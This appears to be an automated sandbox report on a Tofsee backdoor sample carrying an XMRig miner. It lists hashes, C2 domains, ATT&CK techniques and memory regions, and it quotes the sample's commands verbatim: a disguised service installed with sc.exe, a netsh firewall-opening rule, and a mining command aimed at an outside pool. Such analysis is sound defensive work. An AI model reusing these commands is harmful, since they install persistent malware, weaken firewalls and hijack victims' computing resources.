Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    19-06-2022 03:13

General

  • Target

    443befb14d3cbe5c6d57768b5a23b1c262625c9f166708004d58ec624bb51051.exe

  • Size

    309KB

  • MD5

    6e065897fac3e16e1b60f1ba481302a8

  • SHA1

    9d03a3d110dd435641f5c282a3ec1f9d77b656a6

  • SHA256

    443befb14d3cbe5c6d57768b5a23b1c262625c9f166708004d58ec624bb51051

  • SHA512

    38e328d0d4646de2558d0fb279d0fd73d1cc7dfb846a337d8934bb4fc1b9779d5fe2e589883cccd18ca7c3e5b6659a09b3b1008e9de3c3eee5df0490dd99e708

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\443befb14d3cbe5c6d57768b5a23b1c262625c9f166708004d58ec624bb51051.exe
    "C:\Users\Admin\AppData\Local\Temp\443befb14d3cbe5c6d57768b5a23b1c262625c9f166708004d58ec624bb51051.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3276
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\effosdzz\
      2⤵
        PID:4020
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hxdgnuob.exe" C:\Windows\SysWOW64\effosdzz\
        2⤵
          PID:3380
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create effosdzz binPath= "C:\Windows\SysWOW64\effosdzz\hxdgnuob.exe /d\"C:\Users\Admin\AppData\Local\Temp\443befb14d3cbe5c6d57768b5a23b1c262625c9f166708004d58ec624bb51051.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:920
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description effosdzz "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:3132
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start effosdzz
          2⤵
          • Launches sc.exe
          PID:2484
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3060
      • C:\Windows\SysWOW64\effosdzz\hxdgnuob.exe
        C:\Windows\SysWOW64\effosdzz\hxdgnuob.exe /d"C:\Users\Admin\AppData\Local\Temp\443befb14d3cbe5c6d57768b5a23b1c262625c9f166708004d58ec624bb51051.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3936
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:796
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3216

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\hxdgnuob.exe
        Filesize

        10.2MB

        MD5

        ce50ed9b4dff053a5c4bd696bdf08165

        SHA1

        e55d91f1a5841d68a925b8f396e5efd4d6b86e09

        SHA256

        5eea1ff2f22a3b75808b1733b32f6f1dbcc607ac50afd78ceed0deb4ad3dbe2b

        SHA512

        484de1b30887f55650ff0d3c2037ea99f11a1aab65e7b1f4457d79b2221087576b8239ddb6543d8260c7ec06f7a3ef75b8d1a7171c9a0de4b49f2d57bafa3ef0

      • C:\Windows\SysWOW64\effosdzz\hxdgnuob.exe
        Filesize

        10.2MB

        MD5

        ce50ed9b4dff053a5c4bd696bdf08165

        SHA1

        e55d91f1a5841d68a925b8f396e5efd4d6b86e09

        SHA256

        5eea1ff2f22a3b75808b1733b32f6f1dbcc607ac50afd78ceed0deb4ad3dbe2b

        SHA512

        484de1b30887f55650ff0d3c2037ea99f11a1aab65e7b1f4457d79b2221087576b8239ddb6543d8260c7ec06f7a3ef75b8d1a7171c9a0de4b49f2d57bafa3ef0

      • memory/796-490-0x00000000004E0000-0x00000000004F5000-memory.dmp
        Filesize

        84KB

      • memory/796-381-0x00000000004E0000-0x00000000004F5000-memory.dmp
        Filesize

        84KB

      • memory/796-304-0x00000000004E9A6B-mapping.dmp
      • memory/920-190-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/920-180-0x0000000000000000-mapping.dmp
      • memory/920-184-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/920-185-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/920-181-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/920-183-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/2484-199-0x0000000000000000-mapping.dmp
      • memory/3060-215-0x0000000000000000-mapping.dmp
      • memory/3132-189-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3132-188-0x0000000000000000-mapping.dmp
      • memory/3216-516-0x000000000069259C-mapping.dmp
      • memory/3276-139-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-128-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-136-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-137-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-138-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-118-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-140-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-142-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-143-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-144-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-145-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-146-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-147-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-149-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-148-0x0000000002C70000-0x0000000002DBA000-memory.dmp
        Filesize

        1.3MB

      • memory/3276-151-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-150-0x0000000004990000-0x00000000049A3000-memory.dmp
        Filesize

        76KB

      • memory/3276-152-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-153-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-154-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-155-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-156-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-157-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-158-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-159-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-160-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-161-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-162-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-163-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-164-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-165-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-166-0x0000000000400000-0x0000000002C6C000-memory.dmp
        Filesize

        40.4MB

      • memory/3276-168-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-167-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-169-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-119-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-120-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-121-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-122-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-227-0x0000000000400000-0x0000000002C6C000-memory.dmp
        Filesize

        40.4MB

      • memory/3276-123-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-217-0x0000000004990000-0x00000000049A3000-memory.dmp
        Filesize

        76KB

      • memory/3276-124-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-125-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-126-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-134-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-127-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-133-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-132-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-131-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-130-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-135-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3276-129-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3380-186-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3380-175-0x0000000000000000-mapping.dmp
      • memory/3380-179-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3380-178-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3380-177-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3380-176-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/3936-285-0x0000000002F56000-0x0000000002F63000-memory.dmp
        Filesize

        52KB

      • memory/3936-288-0x0000000002DB0000-0x0000000002EFA000-memory.dmp
        Filesize

        1.3MB

      • memory/3936-310-0x0000000002F56000-0x0000000002F63000-memory.dmp
        Filesize

        52KB

      • memory/3936-325-0x0000000000400000-0x0000000002C6C000-memory.dmp
        Filesize

        40.4MB

      • memory/3936-489-0x0000000000400000-0x0000000002C6C000-memory.dmp
        Filesize

        40.4MB

      • memory/4020-173-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/4020-174-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/4020-182-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/4020-172-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/4020-171-0x0000000077790000-0x000000007791E000-memory.dmp
        Filesize

        1.6MB

      • memory/4020-170-0x0000000000000000-mapping.dmp